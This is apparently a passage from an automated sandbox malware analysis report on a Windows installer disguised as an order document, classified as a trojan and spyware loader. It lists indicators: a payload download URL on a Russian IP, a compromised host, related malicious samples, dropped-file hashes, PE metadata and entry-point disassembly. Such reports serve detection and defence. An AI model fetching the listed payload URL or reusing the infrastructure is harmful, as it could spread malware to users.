                        https://api.ipify.org/tOrder NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034F31000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://109.248.150.252/CoefvoxbOhqqwMfAyfMH15.binKOrder NO 000293988494948595850000595995000.exe, 0000000B.00000002.3705946618.0000000004B54000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder NO 000293988494948595850000595995000.exe, 0000000B.00000002.3726491154.0000000034F31000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.26.12.205
                            api.ipify.orgUnited States
                            13335CLOUDFLARENETUSfalse
                            192.185.13.234
                            concaribe.comUnited States
                            46606UNIFIEDLAYER-AS-1UStrue
                            109.248.150.252
                            unknownRussian Federation
                            52048DATACLUBLVfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1568069
                            Start date and time:2024-12-04 09:20:13 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 0s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:15
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Order NO 000293988494948595850000595995000.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/7@2/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 93%
                            • Number of executed functions: 142
                            • Number of non-executed functions: 79
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            04:44:03API Interceptor2390483x Sleep call for process: Order NO 000293988494948595850000595995000.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                            • api.ipify.org/
                            Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                            • api.ipify.org/
                            perfcc.elfGet hashmaliciousXmrigBrowse
                            • api.ipify.org/
                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                            • api.ipify.org/
                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                            • api.ipify.org/
                            hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            192.185.13.234draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            api.ipify.orgEmployee_Bonus_Notlce.pdfGet hashmaliciousUnknownBrowse
                            • 172.67.74.152
                            Employee_Important_Message.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 104.26.12.205
                            v58HgfB8Af.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.13.205
                            zwW6sDt6hU.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                            • 104.26.12.205
                            e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.12.205
                            Svku9pKypu.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                            • 104.26.12.205
                            pR65xo6sud.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 104.26.12.205
                            uLFOeGZaJS.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.13.205
                            Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.13.205
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSidl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                            • 104.21.79.115
                            idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                            • 172.67.170.131
                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                            • 104.21.43.156
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.165.166
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.16.9
                            https://gaajbai.r.tsp1-brevo.net/tr/cl/Ipv8tLM_6XFaC46-AyySv62xU11Gam_6wBo9PhTW-GrEoJin-pUABRxsrn3Ohs7KWpubjNC13uikhD3jyVC-cicv7bjCnB_FKR8ntrSWj62GHX8lS9bF6DjFTod72jGT5orFYUcuEZfFLhYH0PJw3YcV5REfPqGJ30gJCwxSfXvPcvLXBVOydAdUyQvhvO7-TVZ6o3kdYYQkVDMJ3dx52jV6Fez8X6pInuPyzqbRfl7bceqY4dWENNeM8e3cXfQsiIiS3GOEtSEu79PK1qkXINb6Get hashmaliciousUnknownBrowse
                            • 1.1.1.1
                            Kameta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                            • 172.64.41.3
                            Kameta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                            • 172.64.41.3
                            Company Profile and new order-202401127.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 104.21.13.139
                            hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 172.67.177.134
                            DATACLUBLVpayment receipt copy.bat.exeGet hashmaliciousRemcosBrowse
                            • 109.248.151.221
                            product sample requirement.exeGet hashmaliciousXWormBrowse
                            • 109.248.151.221
                            COTIZACIONSyCONSULTA#46789NOV24.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 46.183.220.125
                            Finvasken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 109.248.151.196
                            Finvasken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 109.248.151.196
                            USD Payment Receipt 12112024.exeGet hashmaliciousNoCry, XWormBrowse
                            • 109.248.151.21
                            86#U041b.exeGet hashmaliciousXWormBrowse
                            • 84.38.130.134
                            46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 109.248.150.169
                            46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 109.248.150.169
                            iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 109.248.150.169
                            UNIFIEDLAYER-AS-1USteste.sh4.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                            • 98.130.22.47
                            MGj3hwACvs.htmlGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                            • 192.185.77.66
                            https://ublypwgeo.turismoalperu.com/Get hashmaliciousCaptcha PhishBrowse
                            • 192.185.153.249
                            xd.spc.elfGet hashmaliciousMiraiBrowse
                            • 162.144.32.223
                            https://viisdmltfxtefrcr.adesense.com.br/rwjsgiuoetlhg/mrgnbfiuopegj/rtnlgsyioermbugr/example@email.comGet hashmaliciousPhisherBrowse
                            • 216.172.172.178
                            https://protect.checkpoint.com/v2/r01/___https:/s3.amazonaws.com/C88bb8c57filff9ffEnfrDflpfgzfgxvfEnfl9fhdnsijC.myrq___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjg0NTFhMGFiNjIyOTYxNWNjNDBhNTBlODdjNzQzNTA1Ojc6YjFhNTo5YjUxYTk0NDZmM2Y4NjljMTY5MDc0YmY4ZjFiZWNlODdhNGFhMWU2NDMxNjM5MjUzZGUyMmViMWY2ZmNkOTAzOmg6VDpUGet hashmaliciousUnknownBrowse
                            • 69.49.245.172
                            AudioplaybackVM--00-32AoTranscript.htmlGet hashmaliciousUnknownBrowse
                            • 69.49.245.172
                            http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20=Get hashmaliciousUnknownBrowse
                            • 192.254.185.70
                            pR65xo6sud.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 50.87.144.157
                            uLFOeGZaJS.exeGet hashmaliciousAgentTeslaBrowse
                            • 192.254.225.136
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0ePagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 104.26.12.205
                            Phyurc.exeGet hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            Phyurc.exeGet hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            ft.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.26.12.205
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 104.26.12.205
                            PAYMENT RECEIPT_pdf.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 104.26.12.205
                            fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi _PDF_.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 104.26.12.205
                            nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                            • 104.26.12.205
                            https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82Get hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            hnskldjf230.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 104.26.12.205
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\nszD14F.tmp\System.dllkelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                              FiddlerSetup.5.0.20245.10105-latest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                HHn9tNeZd8.exeGet hashmaliciousGuLoaderBrowse
                                  wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    qmt875Vf1A.exeGet hashmaliciousGuLoaderBrowse
                                      wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        qmt875Vf1A.exeGet hashmaliciousGuLoaderBrowse
                                          czffIfANiL.exeGet hashmaliciousGuLoaderBrowse
                                            0GuwV0t2UU.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              0GuwV0t2UU.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                Process:C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):41
                                                Entropy (8bit):4.159517480745798
                                                Encrypted:false
                                                SSDEEP:3:aZxyzAXMD6WG4AQGNy:/sodMy
                                                MD5:72AA3249175DB3140CA2417E0D3734AF
                                                SHA1:26C42DF76BAE28052FE718345719D9C63C1D0CE5
                                                SHA-256:805937F3343642A10631ED3C4829F25DDFECB4EC9CB240D59C2BC8D57A9BFD83
                                                SHA-512:62B7380DB3DDCEB487C74400AE6640E4AECBAFBBFD9B5D30766EB14E04B968220A739D5E951EDC9D40EE649D2AEE7159258095D49A75E62890211FB64BD9FE59
                                                Malicious:false
                                                Reputation:low
                                                Preview:[minerologies]..Verifications=octateuch..
                                                Process:C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1252774
                                                Entropy (8bit):3.9994449299314123
                                                Encrypted:false
                                                SSDEEP:12288:iRo9PXD3Nfhpr5OHb4f5OoGgP33+BwWF2yA1ICOl:CCfBfLr5O
                                                MD5:A0CF69602A5D36796FC390BE81CC1FDD
                                                SHA1:49AFBDE0DFF80EDB8817BD526996EC50276A5136
                                                SHA-256:D8E89C18189DDB6B0E56DA881013DA275F5D200241B6ECDB1291FA321DE78CAB
                                                SHA-512:FF2AB542AD463CD8074F3239A47AD34F3EFE0C58304EB617074688851E99239E1B117DB9C1B31200886A753E069F6FD0598E86F1A913A65571B10BEC37F3294D
                                                Malicious:false
                                                Reputation:low
                                                Preview:x)......,...................u............(......x).........................................................................................................................................................................................................................................G...T...............j...............................................................................................................................Y.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):5.804946284177748
                                                Encrypted:false
                                                SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: kelscrit.exe, Detection: malicious, Browse
                                                • Filename: FiddlerSetup.5.0.20245.10105-latest.exe, Detection: malicious, Browse
                                                • Filename: HHn9tNeZd8.exe, Detection: malicious, Browse
                                                • Filename: wmKmOQ868z.exe, Detection: malicious, Browse
                                                • Filename: qmt875Vf1A.exe, Detection: malicious, Browse
                                                • Filename: wmKmOQ868z.exe, Detection: malicious, Browse
                                                • Filename: qmt875Vf1A.exe, Detection: malicious, Browse
                                                • Filename: czffIfANiL.exe, Detection: malicious, Browse
                                                • Filename: 0GuwV0t2UU.exe, Detection: malicious, Browse
                                                • Filename: 0GuwV0t2UU.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):94010
                                                Entropy (8bit):1.2383342979277752
                                                Encrypted:false
                                                SSDEEP:768:i9qrj3bsBMZsVMzeC+Uo6XHavWZQvXee9rq:xk2hQNrq
                                                MD5:9F64F450771196B87786BE2512310627
                                                SHA1:3A8ED73D8F37B79E1825CECA4E9FAF95CD69C41E
                                                SHA-256:2B3AEEDC78F7BF296454E5D28457B9B19F081DC637FE0680C748B3D670BA3395
                                                SHA-512:1558AFC4DE1058307867C54BDF660422D2117D5FDF47B6C141E68F701F1770048D3D5AB99895AAA4F058304B0BB24EA89BDFCB1381FECD7775D4BF65055B9CB3
                                                Malicious:false
                                                Reputation:low
                                                Preview:.................?C........................,....3......6........"..................P........y........................................................E..................................................................$...........!........J...................................................R................../...............(.......S................;........W......*.e..........D............*R...................`........[......................M..................................................................O..............................................x.............T........D.....................................................................w..................................."..............N...............C.....o..................#................P.........1..............................................W...........................c........................................................................................................................................h.................
                                                Process:C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):208846
                                                Entropy (8bit):7.495148047115551
                                                Encrypted:false
                                                SSDEEP:6144:/BIrdAaw4NDAnFZOKXsD3eOi3k17pcwdpr5O5/1c:89PXD3Nfhpr5OHc
                                                MD5:07D4918EDABFDD5FE9E58BF1D7F85AB3
                                                SHA1:4D730609AC7234EF2A9962D36D9D4E99DBC73868
                                                SHA-256:20DC2BE7389F4F1961B60ED70D1AF57C47A9DEEF9ABA2D2101E4CE4AADF11E06
                                                SHA-512:A8F25E526B581651D9AE3F862AB5D9CD52531BD615C895FC3F84F216A1D2EB97C9B40E10B162308EAAF583F8C70C9605F6291CC09A965CA4FF4545577F64500C
                                                Malicious:false
                                                Reputation:low
                                                Preview:...........................|..............__..........H.............................77...............555..Y..............................OOOO......VVVVV..yyy...>........e..jj.L.6......uuuu........ff.tt..d....K..;;;;.!....99999.....................;.............ZZZZZ..........;;;................F.....;;...-......v.........ZZZZ...........SSSS............<<.....................................s.XXXXX.................................vv.................~~.........]]..........................|..a..................2................f......................................].""""".GGGG.}......cccccc..........NN.............k......EE..+...........PP..7....U.000.........===....AAA...II....=..G.N.............(.nn..............................j...R.........N........Z.................Z....GG.............................XX..............!..\.................=.....)..ww....... ................................j....................^^.0.......%..............6.......0000...........11.......OO...............
                                                Process:C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):446842
                                                Entropy (8bit):2.652046629876639
                                                Encrypted:false
                                                SSDEEP:1536:2Ocq92oEYvMX/pi98CBDfaCzJ3/m/A9820WYH8Szyt+SoeDYLcFNcChEMQYNcFr9:9NCVJ5m3oGpAbP33+BQLWF2yjE1Ipkp
                                                MD5:9F5FF2B911941F49BB1E95C9EB879200
                                                SHA1:133807F8968B8043ED2EFE92E72CCE953E515804
                                                SHA-256:BB08A1BA4BED6B267E74796794DA545B748F743B4E4EFBD70661D344819A96BE
                                                SHA-512:E8CF3028D7B468DA197B4FD4AF5B2B88BEAC2349B3991440432CCCB722C521C88430C118DB81483621538D2516AEFECA305D1743EF927D42473BFFF8866B1052
                                                Malicious:false
                                                Reputation:low
                                                Preview:00000000BF003030000000004B00008383838300969696960000950000DE0000000000000007000000D3D3D300DE00A800000000000020202000797900001A00006200BEBE00FA000000E400F5F50000E1E1E10000525200A400D5005B00000033003D0000AF0000008B00004E00C2000056565600009900008B0063636300A8A8A8A8A8A8A80000005858007A00DBDB000000000075007C000028000000000009090900000D0D0D0000000000FE0000000000000000EF006C0066000000000F000000000000070048004040404000C4C400DCDCDCDC00000000700074740000750000BC0080800000B1006C00808000EB0000A8000000000000B100007900A200000000BABABA00000000A5000000004900006D6D000018181800000000000044002E003900005C006B000000001D000098989898002222007D7D7D00F4F4004B00464646460000AE0072000D0D000065009000000009090909000017007A7A7A7A0000CD001E000000F7F7F700000000E3E3E3002323006666000000E2000000BD000000DC00E4E4E4E4E4E40000D4D40000EBEB0000000000008C8C8C8C00A8006100DB000000003600F1F10000000000000000000000B8B8005100A7000000003B00D7D7D7000000003200AFAF00000000009292000034000B00000000363600AEAE0000006B6B6B6B00E9E900000000006B
                                                Process:C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):480148
                                                Entropy (8bit):1.2440412261746137
                                                Encrypted:false
                                                SSDEEP:1536:JwEDT97SToCGRVFl5C1SX6/eibc4YMhoEw2T:eQcop5CP/eyYLEtT
                                                MD5:4593D427554A1F61D609FF98908779B3
                                                SHA1:F377A88EB1E9BD29DC1A2730EE3E85651D56C6A0
                                                SHA-256:2209B57FABE05E4E314D5FE84BC99892BC189F11B7793DD7F658E3D403D5FD3C
                                                SHA-512:33A2F6E58DFC1AA7B38E4AA1085B8740CFF02E1A42DB09F46C0516C3F9D9526A6D94D8CF9A6204A289BD6D8110FFD59B6A338F0B81EE1612FD8FD7B29EF272C7
                                                Malicious:false
                                                Reputation:low
                                                Preview:.............................t......|.................<................L........7..............................V...........+.......................L.......z...............................D..........................j.......................................C..\......P.............................................................../.........................................j.............q..[.....................................................................M.........................v........n.......,.....................................................<..q.................................................................................................................}.....................................................&.......F......N........G.......................$.........a.....*.................O.....:..............................................................................................V..................................................u......"u..............j.................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.577193187226755
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Order NO 000293988494948595850000595995000.exe
                                                File size:615'420 bytes
                                                MD5:52131cce80de6868d4eb452ec3bcb91b
                                                SHA1:4ce48ce0ac577aa4008359cc9178dfb1e9e95f25
                                                SHA256:935cbed36f8d1f6e18a988bc200c075039f4dc6ffb1a87e1a72c9f8b393fe4fa
                                                SHA512:88203976f238dc1f93c2bfa7ac255f77755bf0b692f45631d9e7ccc853ef89b8c1d3ddfd0fe86978409bee0f81ac03c81c11757ed2deadb29b3f4b495a1680bc
                                                SSDEEP:12288:tHadcxTcho0xSH0dgsK4lU7MMJtkbgPtYDoZ:VadhaNUdgPsqJtkIYDoZ
                                                TLSH:B2D4E02126E2D863E38092789162E73D8EA1BD961971C2333BF56D9FB614F357C1C3A1
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................h...".....
                                                Icon Hash:7b7b6a6666766633
                                                Entrypoint:0x403665
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x660843F7 [Sat Mar 30 16:55:19 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                Instruction
                                                sub esp, 000003F8h
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebp, ebp
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebp
                                                mov dword ptr [esp+18h], 0040A230h
                                                mov dword ptr [esp+14h], ebp
                                                call dword ptr [004080A0h]
                                                mov esi, dword ptr [004080A4h]
                                                lea eax, dword ptr [esp+34h]
                                                push eax
                                                mov dword ptr [esp+4Ch], ebp
                                                mov dword ptr [esp+0000014Ch], ebp
                                                mov dword ptr [esp+00000150h], ebp
                                                mov dword ptr [esp+38h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007FF130BFA6DAh
                                                lea eax, dword ptr [esp+34h]
                                                mov dword ptr [esp+34h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [esp+48h]
                                                mov ecx, dword ptr [esp+62h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [esp+0000014Eh], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [esp+00000148h], ax
                                                cmp dword ptr [esp+38h], 0Ah
                                                jnc 00007FF130BFA6A8h
                                                and word ptr [esp+42h], 0000h
                                                mov eax, dword ptr [esp+40h]
                                                movzx ecx, byte ptr [esp+3Ch]
                                                mov dword ptr [00429B18h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [esp+38h]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [esp+00000148h]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                movzx ecx, byte ptr [esp+0000004Eh]
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x30ed8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x66d70x68004e97e586f167bf2d2eddcdba22e25c0eFalse0.6615835336538461data6.441769857560007IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x1fb780x600e411b225ac3cd03a5dad8143ae82958dFalse0.5091145833333334data4.122928093833695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x2a0000x260000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x500000x30ed80x3100031e8deac1d179a39ac604bee10e25c60False0.4523875956632653data6.027927468960251IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x503880x10a00Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2914121240601504
                                                RT_ICON0x60d880x9600Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.341015625
                                                RT_ICON0x6a3880x8000PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.99249267578125
                                                RT_ICON0x723880x5600Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.36664244186046513
                                                RT_ICON0x779880x4400Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.40768612132352944
                                                RT_ICON0x7bd880x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.42948190789473684
                                                RT_ICON0x7e3880x1200Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4815538194444444
                                                RT_ICON0x7f5880xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.55078125
                                                RT_ICON0x7ff880x600Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4811197916666667
                                                RT_DIALOG0x805880x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0x806880x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x807a80xc4dataEnglishUnited States0.5918367346938775
                                                RT_DIALOG0x808700x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x808d00x84dataEnglishUnited States0.6742424242424242
                                                RT_VERSION0x809580x23cdataEnglishUnited States0.5314685314685315
                                                RT_MANIFEST0x80b980x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                DLLImport
